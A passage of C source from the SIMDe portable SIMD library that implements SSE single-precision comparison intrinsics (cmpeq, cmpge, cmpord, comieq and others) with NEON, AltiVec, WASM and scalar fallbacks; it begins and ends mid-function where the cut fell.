return _mm512_castps512_ps128(_mm512_abs_ps(_mm512_castps128_ps512(a)));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vabsq_f32(a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_abs(a_.altivec_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_abs(a_.wasm_v128);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = simde_math_fabsf(a_.f32[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpeq_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpeq_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vceqq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_eq(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpeq(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), a_.f32 == b_.f32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] == b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpeq_ps(a, b) simde_mm_cmpeq_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpeq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpeq_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpeq_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] == b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpeq_ss(a, b) simde_mm_cmpeq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpge_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpge_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcgeq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_ge(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpge(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 >= b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] >= b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpge_ps(a, b) simde_mm_cmpge_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpge_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
return _mm_cmpge_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpge_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] >= b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpge_ss(a, b) simde_mm_cmpge_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpgt_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpgt_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcgtq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_gt(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpgt(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 > b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] > b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpgt_ps(a, b) simde_mm_cmpgt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpgt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
return _mm_cmpgt_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpgt_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] > b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpgt_ss(a, b) simde_mm_cmpgt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmple_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmple_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcleq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_le(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmple(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 <= b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] <= b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmple_ps(a, b) simde_mm_cmple_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmple_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmple_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmple_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] <= b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmple_ss(a, b) simde_mm_cmple_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmplt_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmplt_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcltq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_lt(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmplt(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 < b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] < b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmplt_ps(a, b) simde_mm_cmplt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmplt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmplt_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmplt_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] < b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmplt_ss(a, b) simde_mm_cmplt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpneq_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpneq_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vmvnq_u32(vceqq_f32(a_.neon_f32, b_.neon_f32));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_ne(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P9_NATIVE) && SIMDE_ARCH_POWER_CHECK(900) && \
!defined(HEDLEY_IBM_VERSION)
/* vec_cmpne(SIMDE_POWER_ALTIVEC_VECTOR(float), SIMDE_POWER_ALTIVEC_VECTOR(float))
is missing from XL C/C++ v16.1.1,
though the documentation (table 89 on page 432 of the IBM XL C/C++ for
Linux Compiler Reference, Version 16.1.1) shows that it should be
present. Both GCC and clang support it. */
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpne(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpeq(a_.altivec_f32, b_.altivec_f32));
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_nor(r_.altivec_f32, r_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 != b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] != b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpneq_ps(a, b) simde_mm_cmpneq_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpneq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpneq_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpneq_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] != b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpneq_ss(a, b) simde_mm_cmpneq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnge_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmplt_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnge_ps(a, b) simde_mm_cmpnge_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnge_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmplt_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnge_ss(a, b) simde_mm_cmpnge_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpngt_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmple_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpngt_ps(a, b) simde_mm_cmpngt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpngt_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmple_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpngt_ss(a, b) simde_mm_cmpngt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnle_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpgt_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnle_ps(a, b) simde_mm_cmpnle_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnle_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpgt_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnle_ss(a, b) simde_mm_cmpnle_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnlt_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpge_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnlt_ps(a, b) simde_mm_cmpnlt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnlt_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpge_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnlt_ss(a, b) simde_mm_cmpnlt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpord_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpord_ps(a, b);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
return wasm_v128_and(wasm_f32x4_eq(a, a), wasm_f32x4_eq(b, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
/* Note: NEON does not have ordered compare builtin
Need to compare a eq a and b eq b to check for NaN
Do AND of results to get final */
uint32x4_t ceqaa = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t ceqbb = vceqq_f32(b_.neon_f32, b_.neon_f32);
r_.neon_u32 = vandq_u32(ceqaa, ceqbb);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_and(wasm_f32x4_eq(a_.wasm_v128, a_.wasm_v128),
wasm_f32x4_eq(b_.wasm_v128, b_.wasm_v128));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_and(vec_cmpeq(a_.altivec_f32, a_.altivec_f32),
vec_cmpeq(b_.altivec_f32, b_.altivec_f32)));
#elif defined(simde_math_isnanf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (simde_math_isnanf(a_.f32[i]) ||
simde_math_isnanf(b_.f32[i]))
? UINT32_C(0)
: ~UINT32_C(0);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpord_ps(a, b) simde_mm_cmpord_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpunord_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpunord_ps(a, b);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
return wasm_v128_or(wasm_f32x4_ne(a, a), wasm_f32x4_ne(b, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t ceqaa = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t ceqbb = vceqq_f32(b_.neon_f32, b_.neon_f32);
r_.neon_u32 = vmvnq_u32(vandq_u32(ceqaa, ceqbb));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_or(wasm_f32x4_ne(a_.wasm_v128, a_.wasm_v128),
wasm_f32x4_ne(b_.wasm_v128, b_.wasm_v128));
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_nand(vec_cmpeq(a_.altivec_f32, a_.altivec_f32),
vec_cmpeq(b_.altivec_f32, b_.altivec_f32)));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_and(vec_cmpeq(a_.altivec_f32, a_.altivec_f32),
vec_cmpeq(b_.altivec_f32, b_.altivec_f32)));
r_.altivec_f32 = vec_nor(r_.altivec_f32, r_.altivec_f32);
#elif defined(simde_math_isnanf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (simde_math_isnanf(a_.f32[i]) ||
simde_math_isnanf(b_.f32[i]))
? ~UINT32_C(0)
: UINT32_C(0);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpunord_ps(a, b) simde_mm_cmpunord_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpunord_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
return _mm_cmpunord_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpunord_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(simde_math_isnanf)
r_.u32[0] =
(simde_math_isnanf(a_.f32[0]) || simde_math_isnanf(b_.f32[0]))
? ~UINT32_C(0)
: UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.u32) / sizeof(r_.u32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpunord_ss(a, b) simde_mm_cmpunord_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comieq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comieq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_eq_b = vceqq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_eq_b), 0) != 0);
#else
return a_.f32[0] == b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comieq_ss(a, b) simde_mm_comieq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comige_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comige_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_ge_b = vcgeq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_ge_b), 0) != 0);
#else
return a_.f32[0] >= b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comige_ss(a, b) simde_mm_comige_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comigt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comigt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_gt_b = vcgtq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_gt_b), 0) != 0);
#else
return a_.f32[0] > b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comigt_ss(a, b) simde_mm_comigt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comile_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comile_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_le_b = vcleq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_le_b), 0) != 0);
#else
return a_.f32[0] <= b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comile_ss(a, b) simde_mm_comile_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comilt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comilt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_lt_b = vcltq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_lt_b), 0) != 0);
#else
return a_.f32[0] < b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comilt_ss(a, b) simde_mm_comilt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comineq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comineq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_neq_b = vmvnq_u32(vceqq_f32(a_.neon_f32, b_.neon_f32));
return !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_neq_b), 0) != 0);
#else
return a_.f32[0] != b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comineq_ss(a, b) simde_mm_comineq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_copysign_ps(simde__m128 dest, simde__m128 src)
{
simde__m128_private r_, dest_ = simde__m128_to_private(dest),
src_ = simde__m128_to_private(src);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
const uint32x4_t sign_pos =
vreinterpretq_u32_f32(vdupq_n_f32(-SIMDE_FLOAT32_C(0.0)));
r_.neon_u32 = vbslq_u32(sign_pos, src_.neon_u32, dest_.neon_u32);
